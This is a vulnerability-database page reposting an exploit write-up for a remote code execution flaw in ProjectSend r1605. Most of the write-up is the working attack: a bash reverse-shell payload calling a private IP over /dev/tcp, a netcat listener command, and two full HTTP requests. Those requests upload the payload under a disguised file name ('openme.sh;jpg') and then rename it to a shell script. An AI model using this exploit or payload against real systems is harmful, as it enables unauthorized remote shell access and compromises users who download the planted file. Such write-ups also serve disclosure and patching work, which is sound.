Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

projectSend r1605 - Remote Code Exectution Vulnerability

🗓️ 05 Apr 2023 00:00:00Reported by Mirabbas AğalarovType 
zdt
 zdt🔗 0day.today👁 216 Views

ProjectSend r1605 - RCE via File Extension Manipulation, PHP, Linu

Code
Exploit Title: projectSend r1605 - Remote Code Exectution RCE
Application: projectSend
Version: r1605
Bugs:  rce via file extension manipulation
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 26-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux 
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC
========================================

1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. 

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2.Then the attacker starts listening for ip and port 
 nc -lvp 4444
 
3.and when uploading file it makes http request as below.file name should be like this      openme.sh;jpg



POST /includes/upload.process.php HTTP/1.1
Host: localhost
Content-Length: 525
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="name"

openme.sh;jpg
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

------WebKitFormBoundary0enbZuQQAtahFVjI--


4.In the second request, we do this to the filename section at the bottom.

openme.sh


POST /files-edit.php?ids=34 HTTP/1.1
Host: localhost
Content-Length: 1016
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/files-edit.php?ids=34&type=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][id]"

34
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][name]"

openme.sh
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][description]"


------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="save"


------WebKitFormBoundaryc8btjvyb3An7HcmA--


And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce


private youtube video poc : https://youtu.be/Ln7KluDfnk4

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Apr 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8
projectsendrcefile extension manipulationphplinuxremote code executionvulnerabilitymirabbas ağalarovbashhttp request
216